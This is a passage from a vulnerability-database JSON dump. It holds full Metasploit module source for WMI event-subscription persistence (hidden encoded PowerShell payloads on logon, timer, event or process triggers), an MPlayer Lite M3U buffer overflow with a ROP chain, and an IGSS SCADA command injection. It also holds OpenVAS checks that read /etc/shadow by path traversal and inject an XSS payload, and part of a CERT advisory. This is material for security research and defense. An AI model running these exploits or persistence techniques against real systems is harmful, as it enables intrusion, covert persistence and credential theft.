'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => 'true'\n },\n 'References' => [\n ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'],\n ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/']\n ]\n ))\n\n register_options([\n OptEnum.new('PERSISTENCE_METHOD',\n [true, 'Method to trigger the payload.', 'EVENT', ['EVENT','INTERVAL','LOGON','PROCESS', 'WAITFOR']]),\n OptInt.new('EVENT_ID_TRIGGER',\n [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]),\n OptString.new('USERNAME_TRIGGER',\n [true, 'The username to trigger the payload. (Default: BOB)', 'BOB' ]),\n OptString.new('PROCESS_TRIGGER',\n [true, 'The process name to trigger the payload. (Default: CALC.EXE)', 'CALC.EXE' ]),\n OptString.new('WAITFOR_TRIGGER',\n [true, 'The word to trigger the payload. (Default: CALL)', 'CALL' ]),\n OptInt.new('CALLBACK_INTERVAL',\n [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1800000 ]),\n OptString.new('CLASSNAME',\n [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ])\n ])\n\n register_advanced_options(\n [\n OptString.new('CUSTOM_PS_COMMAND',\n [false, 'Custom powershell command to run once the trigger is activated. (Note: some commands will need to be encolsed in quotes)', false, ]),\n ])\n end\n\n\n def exploit\n unless have_powershell?\n print_error(\"This module requires powershell to run\")\n return\n end\n\n unless is_admin?\n print_error(\"This module requires admin privs to run\")\n return\n end\n\n unless is_high_integrity?\n print_error(\"This module requires UAC to be bypassed first\")\n return\n end\n\n if is_system?\n print_error(\"This module cannot run as System\")\n return\n end\n\n host = session.session_host\n print_status('Installing Persistence...')\n\n case datastore['PERSISTENCE_METHOD']\n when 'LOGON'\n psh_exec(subscription_logon)\n print_good \"Persistence installed!\"\n remove_persistence\n when 'INTERVAL'\n psh_exec(subscription_interval)\n print_good \"Persistence installed!\"\n remove_persistence\n when 'EVENT'\n psh_exec(subscription_event)\n print_good \"Persistence installed! Call a shell using \\\"smbclient \\\\\\\\\\\\\\\\#{host}\\\\\\\\C$ -U \"+datastore['USERNAME_TRIGGER']+\" <arbitrary password>\\\"\"\n remove_persistence\n when 'PROCESS'\n psh_exec(subscription_process)\n print_good \"Persistence installed!\"\n remove_persistence\n when 'WAITFOR'\n psh_exec(subscription_waitfor)\n print_good \"Persistence installed! Call a shell using \\\"waitfor.exe /S #{host} /SI \"+datastore['WAITFOR_TRIGGER']+\"\\\"\"\n remove_persistence\n end\n end\n\n\n def build_payload\n if datastore['CUSTOM_PS_COMMAND']\n script_in = datastore['CUSTOM_PS_COMMAND']\n compressed_script = compress_script(script_in, eof = nil)\n encoded_script = encode_script(compressed_script, eof = nil)\n generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: encoded_script)\n else\n cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)\n end\n end\n\n\n def subscription_logon\n command = build_payload\n class_name = datastore['CLASSNAME']\n <<-HEREDOC\n $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \\\"#{class_name}\\\"; Query = \\\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\\\"; QueryLanguage = 'WQL'}\n $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \\\"#{class_name}\\\"; CommandLineTemplate = \\\"#{command}\\\"}\n $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}\n HEREDOC\n end\n\n\n def subscription_interval\n command = build_payload\n class_name = datastore['CLASSNAME']\n callback_interval = datastore['CALLBACK_INTERVAL']\n <<-HEREDOC\n $timer = Set-WmiInstance -Namespace root/cimv2 -Class __IntervalTimerInstruction -Arguments @{ IntervalBetweenEvents = ([UInt32] #{callback_interval}); SkipIfPassed = $false; TimerID = \\\"Trigger\\\"}\n $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \\\"#{class_name}\\\"; Query = \\\"Select * FROM __TimerEvent WHERE TimerID = 'trigger'\\\"; QueryLanguage = 'WQL'}\n $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \\\"#{class_name}\\\"; CommandLineTemplate = \\\"#{command}\\\"}\n $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}\n HEREDOC\n end\n\n\n def subscription_event\n command = build_payload\n event_id = datastore['EVENT_ID_TRIGGER']\n username = datastore['USERNAME_TRIGGER']\n class_name = datastore['CLASSNAME']\n <<-HEREDOC\n $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \\\"#{class_name}\\\"; Query = \\\"SELECT * FROM __InstanceCreationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_NTLogEvent' AND Targetinstance.EventCode = '#{event_id}' And Targetinstance.Message Like '%#{username}%'\\\"; QueryLanguage = 'WQL'}\n $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \\\"#{class_name}\\\"; CommandLineTemplate = \\\"#{command}\\\"}\n $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}\n HEREDOC\n end\n\n\n def subscription_process\n command = build_payload\n class_name = datastore['CLASSNAME']\n process_name = datastore['PROCESS_TRIGGER']\n <<-HEREDOC\n $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \\\"#{class_name}\\\"; Query = \\\"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName= '#{process_name}'\\\"; QueryLanguage = 'WQL'}\n $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \\\"#{class_name}\\\"; CommandLineTemplate = \\\"#{command}\\\"}\n $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}\n HEREDOC\n end\n\n\n def subscription_waitfor\n command = build_payload\n word = datastore['WAITFOR_TRIGGER']\n class_name = datastore['CLASSNAME']\n <<-HEREDOC\n $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \\\"#{class_name}\\\"; Query = \\\"SELECT * FROM __InstanceDeletionEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND Targetinstance.Name = 'waitfor.exe'\\\"; QueryLanguage = 'WQL'}\n $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \\\"#{class_name}\\\"; CommandLineTemplate = \\\"cmd.exe /C waitfor.exe #{word} && #{command} && taskkill /F /IM cmd.exe\\\"}\n $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}\n $filter1 = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{EventNamespace = 'root/cimv2'; Name = \\\"Telemetrics\\\"; Query = \\\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\\\"; QueryLanguage = 'WQL'}\n $consumer1 = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name = \\\"Telemetrics\\\"; CommandLineTemplate = \\\"waitfor.exe #{word}\\\"}\n $FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter1; Consumer = $Consumer1}\n Start-Process -FilePath waitfor.exe #{word} -NoNewWindow\n HEREDOC\n end\n\n\n def log_file\n host = session.session_host\n filenameinfo = \"_\" + ::Time.now.strftime(\"%Y%m%d.%M%S\")\n logs = ::File.join(Msf::Config.log_directory, 'wmi_persistence',\n Rex::FileUtils.clean_path(host + filenameinfo))\n ::FileUtils.mkdir_p(logs)\n logfile = ::File.join(logs, Rex::FileUtils.clean_path(host + filenameinfo) + '.rc')\n end\n\n\n def remove_persistence\n name_class = datastore['CLASSNAME']\n clean_rc = log_file\n if datastore['PERSISTENCE_METHOD'] == \"WAITFOR\"\n clean_up_rc = \"\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH __EventFilter WHERE Name=\\\\\\\"Telemetrics\\\\\\\" DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH CommandLineEventConsumer WHERE Name=\\\\\\\"Telemetrics\\\\\\\" DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\\\\\"Telemetrics\\\\\\\"' DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH __EventFilter WHERE Name=\\\\\\\"#{name_class}\\\\\\\" DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH CommandLineEventConsumer WHERE Name=\\\\\\\"#{name_class}\\\\\\\" DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\\\\\"#{name_class}\\\\\\\"' DELETE\\\"\"\n else\n clean_up_rc = \"\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH __EventFilter WHERE Name=\\\\\\\"#{name_class}\\\\\\\" DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH CommandLineEventConsumer WHERE Name=\\\\\\\"#{name_class}\\\\\\\" DELETE\\\"\\n\"\n clean_up_rc << \"execute -H -f wmic -a \\\"/NAMESPACE:\\\\\\\"\\\\\\\\\\\\\\\\root\\\\\\\\subscription\\\\\\\" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=\\\\\\\"#{name_class}\\\\\\\"' DELETE\\\"\"\n end\n file_local_write(clean_rc, clean_up_rc)\n print_status(\"Clean up Meterpreter RC file: #{clean_rc}\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/wmi_persistence.rb"}, {"lastseen": "2019-12-09T05:46:42", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in MPlayer Lite r33064, caused by improper bounds checking of an URL entry. By persuading the victim to open a specially-crafted .M3U file, specifically by drag-and-dropping it to the player, a remote attacker can execute arbitrary code on the system.\n", "modified": "2017-07-24T13:26:21", "published": "2014-01-24T00:48:21", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/MPLAYER_M3U_BOF", "href": "", "type": "metasploit", "title": "MPlayer Lite M3U Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MPlayer Lite M3U Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability in\n MPlayer Lite r33064, caused by improper bounds checking of an URL entry.\n\n By persuading the victim to open a specially-crafted .M3U file, specifically by\n drag-and-dropping it to the player, a remote attacker can execute arbitrary\n code on the system.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'C4SS!0 and h1ch4m', # Vulnerability discovery and original exploit\n 'Gabor Seljan', # Metasploit module\n ],\n 'References' =>\n [\n [ 'BID', '46926' ],\n [ 'EDB', '17013' ],\n [ 'URL', 'http://www.mplayer-ww.com/eng/' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x20\\x0d\\x0a\\x1a\\x2c\\x2e\\x26\\x2f\\x3a\\x3e\\x3f\\x5c\",\n 'Space' => 5040\n },\n 'Targets' =>\n [\n [ 'Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064',\n {\n 'Offset' => 21,\n 'Ret' => 0x649a7bbe # ADD ESP,64C # PPPR [avformat-52.dll]\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 19 2011',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])\n ],\n self.class)\n\n end\n\n def junk\n return rand_text_alpha(4).unpack(\"V\").first\n end\n\n def nops\n return make_nops(4).unpack(\"V\").first\n end\n\n def exploit\n\n # ROP chain generated by mona.py - See corelan.be\n rop_gadgets =\n [\n 0x6ad9d85d, # POP EBP # RETN [avcodec-52.dll]\n 0x10018fc3, # &CALL ESP [unrar.dll]\n 0x64984a70, # POP EAX # RETN [avformat-52.dll]\n 0xffffec4f, # Value to negate, will become 0x00005040\n 0x6b0ce791, # NEG EAX # RETN [avcodec-52.dll]\n 0x6b063c7d, # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll]\n junk,\n junk,\n 0x1001d154, # POP EAX # RETN [unrar.dll]\n 0x77e71210, # &VirtualProtect() [IAT RPCRT4.dll]\n 0x64987f7f, # MOV EAX,DWORD PTR DS:[EAX] # RETN [avformat-52.dll]\n 0x6afcdc68, # XCHG EAX,ESI # RETN [avcodec-52.dll]\n 0x6b02836d, # POP EAX # RETN [avcodec-52.dll]\n 0xffffffc0, # Value to negate, will become 0x00000040\n 0x6b0ce791, # NEG EAX # RETN [avcodec-52.dll]\n 0x6af79d80, # XCHG EAX,EDX # RETN [avcodec-52.dll]\n 0x1001bad6, # POP ECX # RETN [unrar.dll]\n 0x649eab48, # &Writable location [avformat-52.dll]\n 0x6d7c0bb7, # POP EDI # RETN [swscale-0.dll]\n 0x6b03d722, # RETN (ROP NOP) [avcodec-52.dll]\n 0x64984a70, # POP EAX # RETN [avformat-52.dll]\n nops,\n 0x6d7c57d1 # PUSHAD # RETN [swscale-0.dll]\n ].flatten.pack('V*')\n\n sploit = rand_text_alpha_upper(target['Offset'])\n sploit << rop_gadgets\n sploit << payload.encoded\n sploit << generate_seh_record(target.ret)\n sploit << rand_text_alpha_upper(1000) # Generate exception\n\n # Create the file\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(\"http://\" + sploit)\n\n end\nend\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/mplayer_m3u_bof.rb"}, {"lastseen": "2019-12-06T23:26:26", "bulletinFamily": "exploit", "description": "This module abuses a directory traversal flaw in Interactive Graphical SCADA System v9.00. In conjunction with the traversal flaw, if opcode 0x17 is sent to the dc.exe process, an attacker may be able to execute arbitrary system commands.\n", "modified": "2017-07-24T13:26:21", "published": "2013-10-17T19:07:27", "id": "MSF:EXPLOIT/WINDOWS/SCADA/IGSS_EXEC_17", "href": "", "type": "metasploit", "title": "Interactive Graphical SCADA System Remote Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Interactive Graphical SCADA System Remote Command Injection',\n 'Description' => %q{\n This module abuses a directory traversal flaw in Interactive\n Graphical SCADA System v9.00. In conjunction with the traversal\n flaw, if opcode 0x17 is sent to the dc.exe process, an attacker\n may be able to execute arbitrary system commands.\n },\n 'Author' =>\n [\n 'Luigi Auriemma',\n 'MC'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-1566'],\n [ 'OSVDB', '72349'],\n [ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],\n ],\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'Space' => 153,\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'Windows', {} ]\n ],\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 21 2011'))\n\n register_options(\n [\n Opt::RPORT(12397)\n ])\n end\n\n def exploit\n\n print_status(\"Sending exploit packet...\")\n\n connect\n\n packet = [0x00000100].pack('V') + [0x00000000].pack('V')\n packet << [0x00000100].pack('V') + [0x00000017].pack('V')\n packet << [0x00000000].pack('V') + [0x00000000].pack('V')\n packet << [0x00000000].pack('V') + [0x00000000].pack('V')\n packet << [0x00000000].pack('V') + [0x00000000].pack('V')\n packet << [0x00000000].pack('V')\n packet << \"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\"\n packet << \"windows\\\\system32\\\\cmd.exe\\\" /c #{payload.encoded}\"\n packet << \"\\x00\" * (143) #\n\n sock.put(packet)\n sock.get_once(-1,0.5)\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/scada/igss_exec_17.rb"}], "openvas": [{"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "scanner", "description": "Crestron AirMedia AM-100 is prone to multiple vulnerabilities.", "modified": "2018-10-18T00:00:00", "published": "2016-11-23T00:00:00", "id": "OPENVAS:1361412562310106410", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106410", "title": "Crestron AirMedia AM-100 Multiple Vulnerabilities", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_crestron_mult_vuln.nasl 11949 2018-10-18 06:44:50Z cfischer $\n#\n# Crestron AirMedia AM-100 Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106410\");\n script_version(\"$Revision: 11949 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 08:44:50 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-23 12:47:24 +0700 (Wed, 23 Nov 2016)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2016-5639\", \"CVE-2016-5640\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Crestron AirMedia AM-100 Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"sw_lighttpd_detect.nasl\");\n script_mandatory_keys(\"lighttpd/installed\");\n\n script_tag(name:\"summary\", value:\"Crestron AirMedia AM-100 is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to conduct a directory traversal attack.\");\n\n script_tag(name:\"insight\", value:\"Crestron AirMedia AM-100 is prone to multiple vulnerabilities:\n\n - Directory traversal vulnerability in cgi-bin/login.cgi.\n\n - Hidden Management Console with hardcoded default credentials\n\n - Hardcoded credentials.\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker may read arbitrary system files or login\n with hardcoded credentials.\");\n\n script_tag(name:\"affected\", value:\"Firmware Versions v1.1.1.11 - v1.2.1.\");\n\n script_tag(name:\"solution\", value:\"Update to version 1.4.0.13 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/40813/\");\n script_xref(name:\"URL\", value:\"https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md\");\n script_xref(name:\"URL\", value:\"https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-002.md\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: \"cpe:/a:lighttpd:lighttpd\"))\n exit(0);\n\nurl = \"/cgi-bin/login.cgi?lang=en&src=AwLoginDownload.html\";\nreq = http_get(port: port, item: url);\nres = http_keepalive_send_recv(port: port, data: req);\n\nif (\"<title>Crestron AirMedia</title>\" >< res && \"Device Administration\" >< res &&\n \"Download AirMedia Utility Software\" >< res) {\n trav = \"/cgi-bin/login.cgi?lang=en&src=../../../../../../../../../../../../../../../../../../../../etc/shadow\";\n if (http_vuln_check(port: port, url: trav, pattern: \"root:.*:0:0:99999:7:::\", check_header: TRUE)) {\n report = report_vuln_url(port: port, url: trav);\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-13T20:22:00", "bulletinFamily": "scanner", "description": "This host is running Gnew and is prone to multiple vulnerabilities", "modified": "2019-11-12T00:00:00", "published": "2013-10-17T00:00:00", "id": "OPENVAS:1361412562310804110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804110", "title": "Gnew Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Gnew Multiple Vulnerabilities\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804110\");\n script_version(\"2019-11-12T09:49:27+0000\");\n script_cve_id(\"CVE-2013-5639\", \"CVE-2013-5640\", \"CVE-2013-7349\", \"CVE-2013-7368\");\n script_bugtraq_id(62817, 62818);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-12 09:49:27 +0000 (Tue, 12 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-10-17 14:49:54 +0530 (Thu, 17 Oct 2013)\");\n script_name(\"Gnew Multiple Vulnerabilities\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary HTML\n script code in a user's browser session in the context of an affected site,\n and inject or manipulate SQL queries in the back-end database, allowing\n for the manipulation or disclosure of arbitrary data.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted exploit string via HTTP POST request and check whether it\n is able to read cookie or not.\");\n script_tag(name:\"insight\", value:\"Multiple flaws in Gnew exists due to,\n\n - Insufficient filtration of 'friend_email' HTTP POST parameter passed to\n /news/send.php and users/password.php scripts, 'user_email' HTTP POST\n parameter passed to /users/register.php script, 'news_id' HTTP POST parameter\n passed to news/send.php script, 'thread_id' HTTP POST parameter passed to\n posts/edit.php script, 'story_id' HTTP POST parameter passed to\n comments/index.php script, 'answer_id' and 'question_id' HTTP POST parameters\n passed to polls/vote.php script, 'category_id' HTTP POST parameter passed to\n news/submit.php script, 'post_subject' and 'thread_id' HTTP POST parameters\n passed to posts/edit.php script.\n\n - Insufficient validation of user-supplied input passed via the 'gnew_language'\n cookie to /users/login.php script.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"summary\", value:\"This host is running Gnew and is prone to multiple vulnerabilities\");\n script_tag(name:\"affected\", value:\"Gnew version 2013.1, Other versions may also be affected.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54466\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Oct/7\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/28684\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/123482\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\ngnPort = get_http_port(default:80);\n\nif(!can_host_php(port:gnPort)){\n exit(0);\n}\n\nhost = http_host_name(port:gnPort);\n\nforeach dir (make_list_unique(\"/\", \"/gnew\", \"/cms\", cgi_dirs(port:gnPort)))\n{\n\n if(dir == \"/\") dir = \"\";\n\n if(http_vuln_check(port:gnPort, url: dir + \"/news/index.php\",\n check_header: TRUE, pattern:\">Gnew<\"))\n {\n postdata = \"send=1&user_name=username&user_email=a%40b.com&friend_email=c@d.com&news_id=-1'\" +\n \"<script>alert(document.cookie);</script>\";\n\n url = dir + \"/news/send.php\";\n req = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\\r\\n\",\n postdata);\n\n res = http_keepalive_send_recv(port:gnPort, data:req);\n\n if(res =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie);</script>\" >< res)\n {\n report = report_vuln_url( port:gnPort, url:url );\n security_message(port:gnPort, data:report);\n exit(0);\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2019-10-09T19:49:36", "bulletinFamily": "info", "description": "### Overview \n\nThe Crestron AirMedia AM-100 with firmware prior to version 1.4.0.13 is vulnerable to path traversal and command injection.\n\n### Description \n\n[**CWE-22**](<http://cwe.mitre.org/data/definitions/22.html>)**: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - **CVE-2016-5639\n\n \nA path traversal vulnerability exists in `login.cgi` (and possibly other binaries in the `/home/boa/cgi-bin` directory) on the AM-100 embedded web server. The `src` GET parameter passed to `login.cgi` specifies the relative path to a file for rendering, such as `AwLoginDownload.html`. However, the value of this parameter can specify an arbitrary path on the AM-100 filesystem. \n \n[**CWE-77**](<http://cwe.mitre.org/data/definitions/77.html>)**: Improper Neutralization of Special Elements used in a Command ('Command Injection') - **CVE-2016-5640 \n \nA command injection vulnerability exists in `rftest.cgi` on the AM-100 embedded web server. The ATE_COMMAND POST parameter specifies the path to a command for the underlying OS to execute. By default, the value of this parameter is `/sbin/iwpriv`; however, the value of this parameter can be a relative or absolute path to any arbitrary command on the underlying OS. \n \nCrestron AirMedia AM-100 firmware v1.1.1.11 - v1.2.1 are confirmed affected by the researcher. For more information see the researcher's [advisory one](<https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md>) and [advisory 